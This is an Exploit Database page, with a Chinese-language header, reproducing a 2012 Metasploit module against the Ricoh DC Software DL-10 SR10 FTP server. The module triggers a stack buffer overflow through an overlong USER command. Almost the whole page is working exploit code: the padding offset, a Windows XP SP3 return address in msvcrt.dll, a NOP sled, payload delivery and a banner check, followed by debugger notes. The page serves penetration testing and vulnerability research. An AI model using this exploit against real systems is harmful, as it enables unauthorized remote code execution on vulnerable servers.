Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) – FTP USER Command Buffer Overflow (Metasploit)

• Exploit Database
• 16 阅读

• 作者： Metasploit
  日期： 2012-03-24
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18658/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = NormalRanking
  
  	include Msf::Exploit::Remote::Ftp
  
  	def initialize(info={})
  		super(update_info(info,
  			'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
  			'Description'=> %q{
  					This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
  				service.By supplying a long string of data to the USER command, it is
  				possible to trigger a stack-based buffer overflow, which allows remote code
  				execution under the context of the user.
  
  					Please note that in order to trigger the vulnerability, the server must
  				be configured with a log file name (by default, it's disabled).
  			},
  			'License'=> MSF_LICENSE,
  			'Author' =>
  				[
  					'Julien Ahrens', #Discovery, PoC
  					'sinn3r' #Metasploit
  				],
  			'References' =>
  				[
  					['OSVDB', '79691'],
  					['URL', 'http://secunia.com/advisories/47912'],
  					['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
  				],
  			'Payload'=>
  				{
  					# Yup, no badchars
  					'BadChars' => "\x00",
  				},
  			'DefaultOptions'=>
  				{
  					'ExitFunction' => "process",
  				},
  			'Platform' => 'win',
  			'Targets'=>
  				[
  					[
  						'Windows XP SP3',
  						{
  							'Ret'=> 0x77c35459,#PUSH ESP; RETN (msvcrt.dll)
  							'Offset' => 245
  						}
  					]
  				],
  			'Privileged' => false,
  			'DisclosureDate' => "Mar 1 2012",
  			'DefaultTarget'=> 0))
  
  		# We're triggering the bug via the USER command, no point to have user/pass
  		# as configurable options.
  		deregister_options('FTPPASS', 'FTPUSER')
  	end
  
  	def check
  		connect
  		disconnect
  		if banner =~ /220 DSC ftpd 1\.0 FTP Server/
  			return Exploit::CheckCode::Detected
  		else
  			return Exploit::CheckCode::Safe
  		end
  	end
  
  	def exploit
  		buf = ''
  		buf << rand_text_alpha(target['Offset'], payload_badchars)
  		buf << [target.ret].pack('V')
  		buf << make_nops(20)
  		buf << payload.encoded
  
  		print_status("#{rhost}:#{rport} - Sending #{self.name}")
  		connect
  		send_user(buf)
  		handler
  		disconnect
  	end
  end
  
  =begin
  0:002> lmv m SR10
  startendmodule name
  00400000 00410000 SR10 (deferred) 
  Image path: C:\Program Files\DC Software\SR10.exe
  Image name: SR10.exe
  Timestamp:Mon May 19 23:55:32 2008 (483275E4)
  CheckSum: 00000000
  ImageSize:00010000
  File version: 1.0.0.520
  Product version:1.0.0.0
  File flags: 0 (Mask 3F)
  File OS:4 Unknown Win32
  File type:1.0 App
  File date:00000000.00000000
  Translations: 0409.04b0
  CompanyName:Ricoh Co.,Ltd.
  ProductName:SR-10
  InternalName: SR-10
  OriginalFilename: SR10.EXE
  ProductVersion: 1, 0, 0, 0
  FileVersion:1, 0, 0, 520
  PrivateBuild: 1, 0, 0, 520
  SpecialBuild: 1, 0, 0, 520
  FileDescription:SR-10
  
  
  Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
  stable component we can use is msvcrt.dll for now.
  =end